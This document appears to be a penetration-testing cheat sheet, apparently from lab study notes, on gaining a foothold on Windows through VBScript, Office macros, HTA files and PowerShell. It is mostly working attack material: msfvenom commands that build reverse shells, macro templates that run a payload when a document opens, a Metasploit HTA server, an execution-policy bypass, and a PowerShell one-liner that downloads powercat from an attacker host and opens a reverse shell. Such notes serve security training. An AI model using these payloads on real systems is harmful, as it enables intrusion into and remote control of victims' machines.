# Windows Scripting Host (WSH)


## Visual Basic Script (VB Script)
* `cscript file.exe`, command line scripts
* `wscript file.exe`, UI scripts

* Example (watch out for the whitespace after path, it has to be included)
```sh
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\cmd.exe " & WScript.ScriptFullName),0,True
```
```sh
c:\Windows\System32>wscript /e:VBScript c:\Users\user\Documents\shell.txt
```

## Visual Basic for Application (VBA)
* Access Windows API via Macros
* Open Word, `view` --> `macros`, give a name and select document in `Macros in`
* Create reverse shell
```sh
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4448 -f vba
```
* Insert into the following Macro Content, `Workbook_Open()` for excel, `Document_Open()` for Word macros
```sh
Sub Document_Open()
  SHELL
End Sub

Sub AutoOpen()
  SHELL
End Sub

Sub SHELL()
    <reverse shell goes here>   
End Sub
```

## HTML Application (HTA)

* HTML file including some kind of scripting language like JS, VB, ActiveX
* `mshta` is used to excecute

### POC
* Download file via attacker's web server
* File should look like
```HTML
<html>
  <body>
    <script>
	    var shell= 'cmd.exe'
	    new ActiveXObject('WScript.Shell').Run(shell);
    </script>
 </body>
</html>
```
* Save Document in a macros supporting file format like `Word 97-2003 Template` and `Word 97-2003 Document`


### Reverse Shell
* Craft reverse shell via `msfvenom`
```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4448 -f hta-psh -o shell.hta        
```
* `msfconsole` via
```sh
use exploit/windows/misc/hta_server
```

## Powershell

* Powershell execution policy can be checked via
```sh
Get-ExecutionPolicy
```
* Set policy via
```sh
Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
```
* Bypass via
```sh
powershell -ex bypass -File shell.ps1
```
* Load [powercat](https://github.com/besimorhino/powercat.git) on attacker machine and load it on the target via
```sh
C:\Users\thm\Desktop> powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<attacker-IP>:8000/powercat.ps1');powercat -c <attacker-IP> -p 4448 -e cmd"
```
* Or use msfvenom
```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-IP> LPORT=4447 -f psh -o payload.ps1
```